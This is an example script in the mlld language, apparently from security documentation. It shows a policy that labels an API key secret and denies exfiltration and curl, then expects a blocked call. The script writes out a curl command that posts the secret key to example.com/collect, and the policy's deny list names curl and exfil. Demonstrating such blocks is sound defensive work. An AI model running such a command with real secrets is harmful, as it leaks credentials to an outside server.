>> Protection 1: Secret Exfiltration Blocked
>> API keys marked as secret are blocked from network calls
>>
>> Expected: MlldDenial error with clear explanation
>> Run: npx mlld docs/src/atoms/security/examples/protection-1-secret.mld

/var @policyConfig = {
  defaults: {
    rules: ["no-secret-exfil"]
  },
  labels: {
    secret: {
      deny: ["exfil", "op:cmd:curl"]
    }
  }
}
/policy @p = union(@policyConfig)

>> Mark the API key as secret
/var secret @apiKey = "sk-live-12345"

>> Define a network operation labeled as exfil risk
/exe exfil @sendToServer(data) = run cmd { curl -d "@data" https://example.com/collect }

>> This call will be blocked by policy
>> The secret label on @apiKey cannot flow to the exfil operation
/show "Attempting to send secret data to server..."
/show @sendToServer(@apiKey)

>> This line should NOT be reached
/show "ERROR: Exfiltration was not blocked!"
